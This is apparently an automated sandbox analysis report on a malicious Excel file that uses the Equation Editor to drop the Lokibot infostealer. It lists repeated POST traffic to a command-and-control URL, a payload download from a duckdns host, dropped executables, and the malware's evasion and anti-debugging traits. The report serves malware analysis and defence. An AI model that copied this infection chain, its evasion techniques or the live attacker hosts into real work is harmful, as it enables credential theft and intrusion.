Source: global trafficHTTP traffic detected: POST /ig1/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: toyo-at-jp.infoAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 4AAE78FAContent-Length: 147Connection: close
Source: global trafficHTTP traffic detected: POST /ig1/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: toyo-at-jp.infoAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 4AAE78FAContent-Length: 147Connection: close
Source: global trafficHTTP traffic detected: POST /ig1/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: toyo-at-jp.infoAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 4AAE78FAContent-Length: 147Connection: close
Source: global trafficHTTP traffic detected: POST /ig1/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: toyo-at-jp.infoAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 4AAE78FAContent-Length: 147Connection: close
Source: global trafficHTTP traffic detected: POST /ig1/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: toyo-at-jp.infoAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 4AAE78FAContent-Length: 147Connection: close
Source: global trafficHTTP traffic detected: POST /ig1/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: toyo-at-jp.infoAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 4AAE78FAContent-Length: 147Connection: close
Source: global trafficHTTP traffic detected: POST /ig1/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: toyo-at-jp.infoAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 4AAE78FAContent-Length: 147Connection: close
Source: global trafficHTTP traffic detected: POST /ig1/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: toyo-at-jp.infoAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 4AAE78FAContent-Length: 147Connection: close
Source: global trafficHTTP traffic detected: POST /ig1/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: toyo-at-jp.infoAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 4AAE78FAContent-Length: 147Connection: close
Source: global trafficHTTP traffic detected: POST /ig1/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: toyo-at-jp.infoAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 4AAE78FAContent-Length: 147Connection: close
Source: global trafficHTTP traffic detected: POST /ig1/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: toyo-at-jp.infoAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 4AAE78FAContent-Length: 147Connection: close
Source: global trafficHTTP traffic detected: POST /ig1/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: toyo-at-jp.infoAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 4AAE78FAContent-Length: 147Connection: close
Source: global trafficHTTP traffic detected: POST /ig1/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: toyo-at-jp.infoAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 4AAE78FAContent-Length: 147Connection: close
Source: global trafficHTTP traffic detected: POST /ig1/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: toyo-at-jp.infoAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 4AAE78FAContent-Length: 147Connection: close
Source: global trafficHTTP traffic detected: POST /ig1/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: toyo-at-jp.infoAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 4AAE78FAContent-Length: 147Connection: close
Source: global trafficHTTP traffic detected: POST /ig1/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: toyo-at-jp.infoAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 4AAE78FAContent-Length: 147Connection: close
Source: global trafficHTTP traffic detected: POST /ig1/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: toyo-at-jp.infoAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 4AAE78FAContent-Length: 147Connection: close
Source: global trafficHTTP traffic detected: POST /ig1/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: toyo-at-jp.infoAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 4AAE78FAContent-Length: 147Connection: close
Source: global trafficHTTP traffic detected: POST /ig1/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: toyo-at-jp.infoAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 4AAE78FAContent-Length: 147Connection: close
Contains functionality to download additional files from the internet
Source: C:\Users\user\AppData\Roaming\vbc.exe | Code function: 4_2_00404ED4 recv
Downloads files
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\82C240C7.emf
Downloads files from webservers via HTTP
Source: global traffic | HTTP traffic detected: GET /russdoc/regasm.exe HTTP/1.1 | Accept: */* | Accept-Encoding: gzip, deflate | User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E) | Host: russchine2wsdyspecial6plumbingjkmaterial.duckdns.org | Connection: Keep-Alive
Performs DNS lookups
Source: unknown | DNS traffic detected: queries for: russchine2wsdyspecial6plumbingjkmaterial.duckdns.org
Posts data to webserver
Source: unknown | HTTP traffic detected: POST /ig1/fre.php HTTP/1.0 | User-Agent: Mozilla/4.08 (Charon; Inferno) | Host: toyo-at-jp.info | Accept: */* | Content-Type: application/octet-stream | Content-Encoding: binary | Content-Key: 4AAE78FA | Content-Length: 174 | Connection: close
Tries to download or post to a non-existing http route (HTTP/1.1 404 Not Found / 503 Service Unavailable)
Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Server: nginx/1.16.1 | Date: Thu, 16 Apr 2020 08:44:02 GMT | Content-Type: text/html; charset=UTF-8 | Connection: close | X-Powered-By: PHP/5.6.40 | Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e | Data Ascii: File not found.
Urls found in memory or binary data
Source: vbc.exe, 00000004.00000002.1388312302.0049F000.00000004.00020000.sdmp | String found in binary or memory: http://toyo-at-jp.info/ig1/fre.php
Source: vbc.exe, 00000004.00000002.1388284564.00415000.00000002.00020000.sdmp | String found in binary or memory: http://www.ibsensoftware.com/
Source: vbc.exe, 00000004.00000000.1042586835.004B9000.00000002.00020000.sdmp, regasm[1].exe.2.dr | String found in binary or memory: https://curl.haxx.se/docs/http-cookies.html
Source: vbc.exe, 00000004.00000000.1042629409.004E0000.00000002.00020000.sdmp, regasm[1].exe.2.dr | String found in binary or memory: https://support.google.com/chrome/?p=usage_stats_crash_reports

Key, Mouse, Clipboard, Microphone and Screen Capturing:

Creates a window with clipboard capturing capabilities
Source: C:\Users\user\AppData\Roaming\vbc.exe | Window created: window name: CLIPBRDWNDCLASS

System Summary:

Malicious sample detected (through community Yara rule)
Source: 00000004.00000003.1222647573.02A40000.00000004.00000001.sdmp, type: MEMORY | Matched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
Source: 4.2.vbc.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
Source: 4.2.vbc.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Loki Payload Author: kevoreilly
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
Source: Screenshot number: 4 | Screenshot OCR: document is protected 15 16 17 18 " "" 19 . 20 21 22 w Open the document m If thrS document
Source: Screenshot number: 8 | Screenshot OCR: Enable Editing" from 26 protected documents the yellow bar above 27 28 29 30 31 . D 32 33
Source: Screenshot number: 8 | Screenshot OCR: protected documents the yellow bar above 27 28 29 30 31 . D 32 33 34 35 36 + 500, 88px taj
Office equation editor drops PE file
Source: C:\Program Files\Common Files\microsoft shared\EQUATION\EQNEDT32.EXE | File created: C:\Users\user\AppData\Roaming\vbc.exe
Source: C:\Program Files\Common Files\microsoft shared\EQUATION\EQNEDT32.EXE | File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\BR42M2GZ\regasm[1].exe
Detected potential crypto function
Source: C:\Users\user\AppData\Roaming\vbc.exe | Code function: 4_2_0040549C
Source: C:\Users\user\AppData\Roaming\vbc.exe | Code function: 4_2_004029D4
Source: C:\Users\user\AppData\Roaming\vbc.exe | Code function: 4_2_004A2006
Source: C:\Users\user\AppData\Roaming\vbc.exe | Code function: 4_2_004A2038
Source: C:\Users\user\AppData\Roaming\vbc.exe | Code function: 4_2_004AF267
Source: C:\Users\user\AppData\Roaming\vbc.exe | Code function: 4_2_004AA2A8
Source: C:\Users\user\AppData\Roaming\vbc.exe | Code function: 4_2_004B5707
Source: C:\Users\user\AppData\Roaming\vbc.exe | Code function: 4_2_004B73D1
Document misses a certain OLE stream usually present in this Microsoft Office document type
Source: 20200413_140639.xlsx | OLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
Found potential string decryption / allocating functions
Source: C:\Users\user\AppData\Roaming\vbc.exe | Code function: String function: 0041219C appears 45 times
Source: C:\Users\user\AppData\Roaming\vbc.exe | Code function: String function: 00405B6F appears 41 times
PE file contains strange resources
Source: regasm[1].exe.2.dr | Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: vbc.exe.2.dr | Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Searches the installation path of Mozilla Firefox
Source: C:\Users\user\AppData\Roaming\vbc.exe | Registry key queried: HKEY_LOCAL_MACHINE\SOFTWARE\Mozilla\Mozilla Firefox\54.0.1 (x86 en-US)\Main Install Directory
Yara signature match
Source: 00000004.00000003.1222647573.02A40000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
Source: 4.2.vbc.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
Source: 4.2.vbc.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
Classification label
Source: classification engine | Classification label: mal100.troj.spyw.expl.evad.winXLSX@5/7@82/3
Contains functionality to adjust token privileges (e.g. debug / backup)
Source: C:\Users\user\AppData\Roaming\vbc.exe | Code function: 4_2_0040650A LookupPrivilegeValueW, AdjustTokenPrivileges
Contains functionality to instantiate COM classes
Source: C:\Users\user\AppData\Roaming\vbc.exe | Code function: 4_2_0040434D CoInitialize, CoCreateInstance, VariantInit, SysAllocString, VariantInit, VariantInit, SysAllocString, VariantInit, SysFreeString, SysFreeString, CoUninitialize
Creates files inside the user directory
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | File created: C:\Users\user\Desktop\~$20200413_140639.xlsx
Creates mutexes
Source: C:\Users\user\AppData\Roaming\vbc.exe | Mutant created: \Sessions\1\BaseNamedObjects\09E3E1D85CB65E97AFA24C0A
Creates temporary files
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | File created: C:\Users\user\AppData\Local\Temp\CVRFAED.tmp
Reads ini files
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | File read: C:\Users\desktop.ini
Reads software policies
Source: C:\Users\user\AppData\Roaming\vbc.exe | Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Reads the hosts file
Source: C:\Program Files\Common Files\microsoft shared\EQUATION\EQNEDT32.EXE | File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Users\user\AppData\Roaming\vbc.exe | File read: C:\Windows\System32\drivers\etc\hosts
Sample is known by Antivirus
Source: 20200413_140639.xlsx | Virustotal: Detection: 25%
Source: 20200413_140639.xlsx | ReversingLabs: Detection: 26%
Spawns processes
Source: unknown | Process created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
Source: unknown | Process created: C:\Program Files\Common Files\microsoft shared\EQUATION\EQNEDT32.EXE 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
Source: unknown | Process created: C:\Users\user\AppData\Roaming\vbc.exe 'C:\Users\user\AppData\Roaming\vbc.exe'
Source: unknown | Process created: C:\Windows\System32\mspaint.exe C:\Windows\system32\mspaint.exe -Embedding
Source: C:\Program Files\Common Files\microsoft shared\EQUATION\EQNEDT32.EXE | Process created: C:\Users\user\AppData\Roaming\vbc.exe 'C:\Users\user\AppData\Roaming\vbc.exe'
Uses an in-process (OLE) Automation server
Source: C:\Users\user\AppData\Roaming\vbc.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{926749fa-2615-4987-8845-c33e65f2b957}\InProcServer32
Uses Rich Edit Controls
Source: C:\Windows\System32\mspaint.exe | File opened: C:\Windows\system32\MSFTEDIT.DLL
Found graphical window changes (likely an installer)
Source: Window Recorder | Window detected: More than 3 window changes detected
Checks if Microsoft Office is installed
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems
Uses new MSVCR Dlls
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | File opened: C:\Windows\WinSxS\x86_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_50916076bcb9a742\MSVCR90.dll
Document has a 'vbamacros' value indicative of goodware
Source: 20200413_140639.xlsx | Initial sample: OLE indicators vbamacros = False
Document has an 'encrypted' value indicative of goodware
Source: 20200413_140639.xlsx | Initial sample: OLE indicators encrypted = True

Data Obfuscation:

Detected unpacking (changes PE section rights)
Source: C:\Users\user\AppData\Roaming\vbc.exe | Unpacked PE file: 4.2.vbc.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.rsrc:R;.reloc:R; vs .text:ER;.rdata:R;.data:W;.x:W;
Detected unpacking (overwrites its own PE header)
Source: C:\Users\user\AppData\Roaming\vbc.exe | Unpacked PE file: 4.2.vbc.exe.400000.0.unpack
Yara detected aPLib compressed binary
Source: Yara match | File source: 00000004.00000002.1388284564.00415000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000003.1222647573.02A40000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: vbc.exe PID: 2328, type: MEMORY
Source: Yara match | File source: 4.2.vbc.exe.400000.0.unpack, type: UNPACKEDPE
Contains functionality to dynamically determine API calls
Source: C:\Users\user\AppData\Roaming\vbc.exe | Code function: 4_2_004B033C LoadLibraryExW, GetLastError, LoadLibraryW, GetProcAddress, GetProcAddress, GetProcAddress, GetProcAddress, GetProcAddress, IsDebuggerPresent, OutputDebugStringW, RtlDecodePointer
Uses code obfuscation techniques (call, push, ret)
Source: C:\Users\user\AppData\Roaming\vbc.exe | Code function: 4_2_00402AC0 push eax; ret 4_2_00402AD4
Source: C:\Users\user\AppData\Roaming\vbc.exe | Code function: 4_2_00402AC0 push eax; ret 4_2_00402AFC
Source: C:\Users\user\AppData\Roaming\vbc.exe | Code function: 4_2_004A645B push esi; ret 4_2_004A645D
Source: C:\Users\user\AppData\Roaming\vbc.exe | Code function: 4_2_004A685C push edi; ret 4_2_004A685E
Source: C:\Users\user\AppData\Roaming\vbc.exe | Code function: 4_2_004A7083 push esi; ret 4_2_004A7085
Source: C:\Users\user\AppData\Roaming\vbc.exe | Code function: 4_2_004A7484 push edi; ret 4_2_004A7486
Source: C:\Users\user\AppData\Roaming\vbc.exe | Code function: 4_2_004A3495 push ecx; ret 4_2_004A34A8
Source: C:\Users\user\AppData\Roaming\vbc.exe | Code function: 4_2_004A5231 push edi; ret 4_2_004A5232
Source: C:\Users\user\AppData\Roaming\vbc.exe | Code function: 4_2_004A6767 push esi; ret 4_2_004A6769
Source: C:\Users\user\AppData\Roaming\vbc.exe | Code function: 4_2_004A73DE push edi; ret 4_2_004A73E0
Source: C:\Users\user\AppData\Roaming\vbc.exe | Code function: 4_2_004A738F push esi; ret 4_2_004A7391
Source: C:\Users\user\AppData\Roaming\vbc.exe | Code function: 4_2_004A67B6 push edi; ret 4_2_004A67B8

Persistence and Installation Behavior:

Drops PE files
Source: C:\Program Files\Common Files\microsoft shared\EQUATION\EQNEDT32.EXE | File created: C:\Users\user\AppData\Roaming\vbc.exe
Source: C:\Program Files\Common Files\microsoft shared\EQUATION\EQNEDT32.EXE | File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\BR42M2GZ\regasm[1].exe

Hooking and other Techniques for Hiding and Protection:

Disables application error messages (SetErrorMode)
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Common Files\microsoft shared\EQUATION\EQNEDT32.EXE | Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\vbc.exe | Process information set: NOGPFAULTERRORBOX
Source: C:\Users\user\AppData\Roaming\vbc.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
Source: C:\Users\user\AppData\Roaming\vbc.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
Source: C:\Users\user\AppData\Roaming\vbc.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
Source: C:\Users\user\AppData\Roaming\vbc.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
Source: C:\Users\user\AppData\Roaming\vbc.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
Source: C:\Users\user\AppData\Roaming\vbc.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
Source: C:\Users\user\AppData\Roaming\vbc.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
Source: C:\Users\user\AppData\Roaming\vbc.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
Source: C:\Users\user\AppData\Roaming\vbc.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
Source: C:\Users\user\AppData\Roaming\vbc.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
Source: C:\Users\user\AppData\Roaming\vbc.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
Source: C:\Users\user\AppData\Roaming\vbc.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
Source: C:\Users\user\AppData\Roaming\vbc.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
Source: C:\Users\user\AppData\Roaming\vbc.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
Source: C:\Users\user\AppData\Roaming\vbc.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
Source: C:\Users\user\AppData\Roaming\vbc.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
Source: C:\Users\user\AppData\Roaming\vbc.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
Source: C:\Users\user\AppData\Roaming\vbc.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
Source: C:\Users\user\AppData\Roaming\vbc.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
Source: C:\Users\user\AppData\Roaming\vbc.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
Source: C:\Users\user\AppData\Roaming\vbc.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
Source: C:\Users\user\AppData\Roaming\vbc.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
Source: C:\Users\user\AppData\Roaming\vbc.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
Source: C:\Users\user\AppData\Roaming\vbc.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
Source: C:\Users\user\AppData\Roaming\vbc.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
Source: C:\Users\user\AppData\Roaming\vbc.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
Source: C:\Users\user\AppData\Roaming\vbc.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
Source: C:\Users\user\AppData\Roaming\vbc.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
Source: C:\Users\user\AppData\Roaming\vbc.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
Source: C:\Users\user\AppData\Roaming\vbc.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
Source: C:\Users\user\AppData\Roaming\vbc.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
Source: C:\Users\user\AppData\Roaming\vbc.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
Source: C:\Users\user\AppData\Roaming\vbc.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
Source: C:\Users\user\AppData\Roaming\vbc.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
Source: C:\Users\user\AppData\Roaming\vbc.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
Source: C:\Users\user\AppData\Roaming\vbc.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
Source: C:\Users\user\AppData\Roaming\vbc.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
Source: C:\Users\user\AppData\Roaming\vbc.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
Source: C:\Users\user\AppData\Roaming\vbc.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
Source: C:\Users\user\AppData\Roaming\vbc.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
Source: C:\Users\user\AppData\Roaming\vbc.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
Source: C:\Users\user\AppData\Roaming\vbc.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
Source: C:\Users\user\AppData\Roaming\vbc.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
Source: C:\Users\user\AppData\Roaming\vbc.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
Source: C:\Users\user\AppData\Roaming\vbc.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
Source: C:\Users\user\AppData\Roaming\vbc.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
Source: C:\Users\user\AppData\Roaming\vbc.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
Source: C:\Users\user\AppData\Roaming\vbc.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
Source: C:\Users\user\AppData\Roaming\vbc.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
Source: C:\Users\user\AppData\Roaming\vbc.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
Source: C:\Users\user\AppData\Roaming\vbc.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
Source: C:\Users\user\AppData\Roaming\vbc.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
Source: C:\Users\user\AppData\Roaming\vbc.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
Source: C:\Users\user\AppData\Roaming\vbc.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
Source: C:\Users\user\AppData\Roaming\vbc.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
Source: C:\Users\user\AppData\Roaming\vbc.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
Source: C:\Users\user\AppData\Roaming\vbc.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
Source: C:\Users\user\AppData\Roaming\vbc.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
Source: C:\Users\user\AppData\Roaming\vbc.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
Source: C:\Users\user\AppData\Roaming\vbc.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
Source: C:\Users\user\AppData\Roaming\vbc.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
Source: C:\Users\user\AppData\Roaming\vbc.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
Source: C:\Windows\System32\mspaint.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\mspaint.exe Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
Document contains OLE streams with high entropy indicating encrypted embedded content
Source: 20200413_140639.xlsx Stream path 'EncryptedPackage' entropy: 7.99967464959 (max. 8.0)

Malware Analysis System Evasion:

Contains functionality for execution timing, often used to detect debuggers
Source: C:\Users\user\AppData\Roaming\vbc.exe Code function: 4_2_013A278E rdtsc 4_2_013A278E
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Program Files\Common Files\microsoft shared\EQUATION\EQNEDT32.EXE TID: 2192 Thread sleep time: -1200000s >= -30000s
Source: C:\Users\user\AppData\Roaming\vbc.exe TID: 2308 Thread sleep time: -60000s >= -30000s
Source: C:\Windows\System32\mspaint.exe TID: 2452 Thread sleep time: -14520000s >= -30000s
Contains functionality to enumerate / list files inside a directory
Source: C:\Users\user\AppData\Roaming\vbc.exe Code function: 4_2_00403D74 FindFirstFileW,FindNextFileW,FindFirstFileW,FindNextFileW,4_2_00403D74
Source: C:\Users\user\AppData\Roaming\vbc.exe Code function: 4_2_004AB84C __getdrive,FindFirstFileExW,__wfullpath_helper,_IsRootUNCName,GetDriveTypeW,___loctotime64_t,FileTimeToLocalFileTime,FileTimeToSystemTime,___loctotime64_t,FileTimeToLocalFileTime,FileTimeToSystemTime,___loctotime64_t,FileTimeToLocalFileTime,FileTimeToSystemTime,___loctotime64_t,FindClose,GetLastError,FindClose,GetLastError,FindClose,4_2_004AB84C
May try to detect the virtual machine to hinder analysis (VM artifact strings found in memory)
Source: vbc.exe, 00000004.00000003.1222749766.02C40000.00000004.00000001.sdmp Binary or memory string:

Anti Debugging:

Contains functionality for execution timing, often used to detect debuggers
Source: C:\Users\user\AppData\Roaming\vbc.exe Code function: 4_2_013A278E rdtsc 4_2_013A278E
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Source: C:\Users\user\AppData\Roaming\vbc.exe Code function: 4_2_004A4B55 IsDebuggerPresent,4_2_004A4B55
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Source: C:\Users\user\AppData\Roaming\vbc.exe Code function: 4_2_004B033C LoadLibraryExW,GetLastError,LoadLibraryW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,IsDebuggerPresent,OutputDebugStringW,RtlDecodePointer,4_2_004B033C
Contains functionality to dynamically determine API calls
Source: C:\Users\user\AppData\Roaming\vbc.exe Code function: 4_2_004B033C LoadLibraryExW,GetLastError,LoadLibraryW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,IsDebuggerPresent,OutputDebugStringW,RtlDecodePointer,4_2_004B033C
Contains functionality to read the PEB
Source: C:\Users\user\AppData\Roaming\vbc.exe Code function: 4_2_0040317B mov eax, dword ptr fs:[00000030h] 4_2_0040317B
Source: C:\Users\user\AppData\Roaming\vbc.exe Code function: 4_2_013A202E mov eax, dword ptr fs:[00000030h] 4_2_013A202E
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Source: C:\Users\user\AppData\Roaming\vbc.exe Code function: 4_2_00402B7C GetProcessHeap,RtlAllocateHeap,4_2_00402B7C
Enables debug privileges
Source: C:\Users\user\AppData\Roaming\vbc.exe Process token adjusted: Debug

HIPS / PFW / Operating System Protection Evasion:

Creates a process in suspended mode (likely to inject code)
Source: C:\Program Files\Common Files\microsoft shared\EQUATION\EQNEDT32.EXE Process created: C:\Users\user\AppData\Roaming\vbc.exe 'C:\Users\user\AppData\Roaming\vbc.exe'
May try to detect the Windows Explorer process (often used for injection)
Source: vbc.exe, 00000004.00000002.1388407355.00650000.00000002.00000001.sdmp Binary or memory string: Program Manager
Source: vbc.exe, 00000004.00000002.1388407355.00650000.00000002.00000001.sdmp Binary or memory string: Progman
Source: vbc.exe, 00000004.00000002.1388407355.00650000.00000002.00000001.sdmp Binary or memory string: Shell_TrayWnd

Language, Device and Operating System Detection:

Contains functionality to query locale information (e.g. system language)
Source: C:\Users\user\AppData\Roaming\vbc.exe Code function: GetLocaleInfoW,GetLocaleInfoW,__wcsnicmp,GetLocaleInfoW,4_2_004B244F
Source: C:\Users\user\AppData\Roaming\vbc.exe Code function: GetLocaleInfoW,_GetPrimaryLen,4_2_004B2817
Source: C:\Users\user\AppData\Roaming\vbc.exe Code function: ___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___free_lconv_num,InterlockedDecrement,InterlockedDecrement,4_2_004B0CD2
Source: C:\Users\user\AppData\Roaming\vbc.exe Code function: ___crtGetLocaleInfoA,GetLastError,___crtGetLocaleInfoA,___crtGetLocaleInfoA,__invoke_watson,4_2_004A38ED
Source: C:\Users\user\AppData\Roaming\vbc.exe Code function: _TranslateName,_GetLocaleNameFromLangCountry,_GetLocaleNameFromLanguage,IsValidCodePage,__itow_s,__invoke_watson,GetLocaleInfoW,4_2_004B2104
Source: C:\Users\user\AppData\Roaming\vbc.exe Code function: EnumSystemLocalesW,4_2_004A31E5
Source: C:\Users\user\AppData\Roaming\vbc.exe Code function: __crtGetLocaleInfoA_stat,4_2_004B05F6
Source: C:\Users\user\AppData\Roaming\vbc.exe Code function: GetLocaleInfoW,4_2_004B2642
